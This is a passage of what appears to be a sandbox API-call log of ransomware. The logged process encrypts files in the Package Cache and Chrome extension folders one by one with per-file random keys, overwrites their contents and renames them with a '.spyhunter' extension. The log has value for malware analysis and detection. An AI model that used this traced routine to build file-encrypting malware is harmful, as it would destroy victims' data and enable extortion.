lpNewFilePointer=0xffffffff) returned 1 [0136.790] WriteFile (in: hFile=0x188, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f1b4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270f1b4*=0x2800, lpOverlapped=0x0) returned 1 [0136.790] GetProcessHeap () returned 0x2c0000 [0136.790] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0136.790] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.790] WriteFile (in: hFile=0x188, lpBuffer=0x270f1f4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f1b4, lpOverlapped=0x0 | out: lpBuffer=0x270f1f4*, lpNumberOfBytesWritten=0x270f1b4*=0x4, lpOverlapped=0x0) returned 1 [0136.804] WriteFile (in: hFile=0x188, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f1b4, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270f1b4*=0x30, lpOverlapped=0x0) returned 1 [0136.804] CloseHandle (hObject=0x188) returned 1 [0136.804] GetProcessHeap () returned 0x2c0000 [0136.804] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f4cd10 [0136.804] wnsprintfW (in: pszDest=0x2f4cd10, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab.spyhunter") returned 131 [0136.804] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\cab1.cab"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab.spyhunter" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\cab1.cab.spyhunter")) returned 1 [0136.808] GetProcessHeap () returned 0x2c0000 [0136.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4cd10 | out: hHeap=0x2c0000) returned 1 [0136.808] GetProcessHeap () returned 0x2c0000 [0136.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0136.808] GetProcessHeap () returned 0x2c0000 [0136.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f05c80 | out: hHeap=0x2c0000) returned 1 [0136.809] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f1f0 | out: pbBuffer=0x270f1f0) returned 1 [0136.809] GetProcessHeap () returned 0x2c0000 [0136.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0136.809] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270f1e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270f1e8*=0x30) returned 1 [0136.809] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\eventpage_bin_prod.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\eventpage_bin_prod.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0136.809] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\eventpage_bin_prod.js") returned 151 [0136.809] StrStrW (lpFirst="eventpage_bin_prod.js", lpSrch=".txt") returned 0x0 [0136.809] GetProcessHeap () returned 0x2c0000 [0136.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0136.809] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f1ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270f1ac*=0x2800, lpOverlapped=0x0) returned 1 [0136.916] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.916] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f1ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270f1ac*=0x2800, lpOverlapped=0x0) returned 1 [0136.916] GetProcessHeap () returned 0x2c0000 [0136.916] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0136.916] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.916] WriteFile (in: hFile=0xec, lpBuffer=0x270f1ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f1ac, lpOverlapped=0x0 | out: lpBuffer=0x270f1ec*, lpNumberOfBytesWritten=0x270f1ac*=0x4, lpOverlapped=0x0) returned 1 [0136.921] WriteFile (in: hFile=0xec, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f1ac, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270f1ac*=0x30, lpOverlapped=0x0) returned 1 [0136.921] CloseHandle (hObject=0xec) returned 1 [0136.921] GetProcessHeap () returned 0x2c0000 [0136.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0136.921] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\eventpage_bin_prod.js.spyhunter") returned 161 [0136.922] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\eventpage_bin_prod.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\eventpage_bin_prod.js"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\eventpage_bin_prod.js.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\eventpage_bin_prod.js.spyhunter")) returned 1 [0136.922] GetProcessHeap () returned 0x2c0000 [0136.923] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0136.923] GetProcessHeap () returned 0x2c0000 [0136.923] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0136.923] GetProcessHeap () returned 0x2c0000 [0136.923] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3ab80 | out: hHeap=0x2c0000) returned 1 [0136.924] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f1e8 | out: pbBuffer=0x270f1e8) returned 1 [0136.924] GetProcessHeap () returned 0x2c0000 [0136.924] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0136.924] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270f1e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270f1e0*=0x30) returned 1 [0136.924] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0136.925] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\messages.json") returned 155 [0136.925] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0136.925] GetProcessHeap () returned 0x2c0000 [0136.925] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0136.925] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f1a4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270f1a4*=0x84, lpOverlapped=0x0) returned 1 [0136.926] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffff7c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.926] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x84, lpNumberOfBytesWritten=0x270f1a4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270f1a4*=0x84, lpOverlapped=0x0) returned 1 [0136.926] GetProcessHeap () returned 0x2c0000 [0136.926] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0136.926] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.926] WriteFile (in: hFile=0xec, lpBuffer=0x270f1e4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f1a4, lpOverlapped=0x0 | out: lpBuffer=0x270f1e4*, lpNumberOfBytesWritten=0x270f1a4*=0x4, lpOverlapped=0x0) returned 1 [0136.926] WriteFile (in: hFile=0xec, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f1a4, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270f1a4*=0x30, lpOverlapped=0x0) returned 1 [0136.927] CloseHandle (hObject=0xec) returned 1 [0136.927] GetProcessHeap () returned 0x2c0000 [0136.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0136.927] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\messages.json.spyhunter") returned 165 [0136.927] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\messages.json.spyhunter")) returned 1 [0136.928] GetProcessHeap () returned 0x2c0000 [0136.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0136.928] GetProcessHeap () returned 0x2c0000 [0136.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0136.928] GetProcessHeap () returned 0x2c0000 [0136.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6db80 | out: hHeap=0x2c0000) returned 1 [0137.508] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f1d8 | out: pbBuffer=0x270f1d8) returned 1 [0137.508] GetProcessHeap () returned 0x2c0000 [0137.508] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0137.508] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f1d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f1d0*=0x30) returned 1 [0137.508] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_background.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_background.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0137.511] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_background.js") returned 152 [0137.511] StrStrW (lpFirst="craw_background.js", lpSrch=".txt") returned 0x0 [0137.511] GetProcessHeap () returned 0x2c0000 [0137.511] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0137.512] ReadFile (in: hFile=0x188, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f194, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270f194*=0x2800, lpOverlapped=0x0) returned 1 [0137.536] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0137.536] WriteFile (in: hFile=0x188, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f194, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270f194*=0x2800, lpOverlapped=0x0) returned 1 [0137.537] GetProcessHeap () returned 0x2c0000 [0137.537] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0137.537] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0137.537] WriteFile (in: hFile=0x188, lpBuffer=0x270f1d4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f194, lpOverlapped=0x0 | out: lpBuffer=0x270f1d4*, lpNumberOfBytesWritten=0x270f194*=0x4, lpOverlapped=0x0) returned 1 [0137.623] WriteFile (in: hFile=0x188, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f194, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f194*=0x30, lpOverlapped=0x0) returned 1 [0137.623] CloseHandle (hObject=0x188) returned 1 [0137.888] GetProcessHeap () returned 0x2c0000 [0137.888] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fd0048 [0137.888] wnsprintfW (in: pszDest=0x2fd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_background.js.spyhunter") returned 162 [0137.888] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_background.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_background.js"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_background.js.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_background.js.spyhunter")) returned 1 [0137.889] GetProcessHeap () returned 0x2c0000 [0137.889] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fd0048 | out: hHeap=0x2c0000) returned 1 [0137.889] GetProcessHeap () returned 0x2c0000 [0137.889] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0137.889] GetProcessHeap () returned 0x2c0000 [0137.889] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f7f8b8 | out: hHeap=0x2c0000) returned 1 [0137.891] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f1d0 | out: pbBuffer=0x270f1d0) returned 1 [0137.891] GetProcessHeap () returned 0x2c0000 [0137.891] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0137.891] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f1c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f1c8*=0x30) returned 1 [0137.891] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0137.891] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\messages.json") returned 155 [0137.891] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0137.891] GetProcessHeap () returned 0x2c0000 [0137.891] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0137.892] ReadFile (in: hFile=0x188, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f18c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270f18c*=0x108, lpOverlapped=0x0) returned 1 [0137.894] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xfffffef8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0137.894] WriteFile (in: hFile=0x188, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x270f18c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270f18c*=0x108, lpOverlapped=0x0) returned 1 [0137.894] GetProcessHeap () returned 0x2c0000 [0137.895] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0137.895] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0137.895] WriteFile (in: hFile=0x188, lpBuffer=0x270f1cc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f18c, lpOverlapped=0x0 | out: lpBuffer=0x270f1cc*, lpNumberOfBytesWritten=0x270f18c*=0x4, lpOverlapped=0x0) returned 1 [0137.895] WriteFile (in: hFile=0x188, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f18c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f18c*=0x30, lpOverlapped=0x0) returned 1 [0137.895] CloseHandle (hObject=0x188) returned 1 [0137.895] GetProcessHeap () returned 0x2c0000 [0137.895] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fd0048 [0137.895] wnsprintfW (in: pszDest=0x2fd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\messages.json.spyhunter") returned 165 [0137.895] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\messages.json.spyhunter")) returned 1 [0137.896] GetProcessHeap () returned 0x2c0000 [0137.896] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fd0048 | out: hHeap=0x2c0000) returned 1 [0137.896] GetProcessHeap () returned 0x2c0000 [0137.896] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0137.896] GetProcessHeap () returned 0x2c0000 [0137.896] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f1dfd8 | out: hHeap=0x2c0000) returned 1 [0137.897] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f1c8 | out: pbBuffer=0x270f1c8) returned 1 [0137.897] GetProcessHeap () returned 0x2c0000 [0137.897] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0137.897] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f1c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f1c0*=0x30) returned 1 [0137.897] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0137.898] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\messages.json") returned 155 [0137.898] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0137.898] GetProcessHeap () returned 0x2c0000 [0137.898] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0137.898] ReadFile (in: hFile=0x188, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f184, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270f184*=0x121, lpOverlapped=0x0) returned 1 [0137.899] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xfffffedf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0137.899] WriteFile (in: hFile=0x188, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x121, lpNumberOfBytesWritten=0x270f184, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270f184*=0x121, lpOverlapped=0x0) returned 1 [0137.899] GetProcessHeap () returned 0x2c0000 [0137.899] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0137.899] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0137.899] WriteFile (in: hFile=0x188, lpBuffer=0x270f1c4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f184, lpOverlapped=0x0 | out: lpBuffer=0x270f1c4*, lpNumberOfBytesWritten=0x270f184*=0x4, lpOverlapped=0x0) returned 1 [0137.899] WriteFile (in: hFile=0x188, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f184, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f184*=0x30, lpOverlapped=0x0) returned 1 [0137.899] CloseHandle (hObject=0x188) returned 1 [0137.899] GetProcessHeap () returned 0x2c0000 [0137.899] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fd0048 [0137.899] wnsprintfW (in: pszDest=0x2fd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 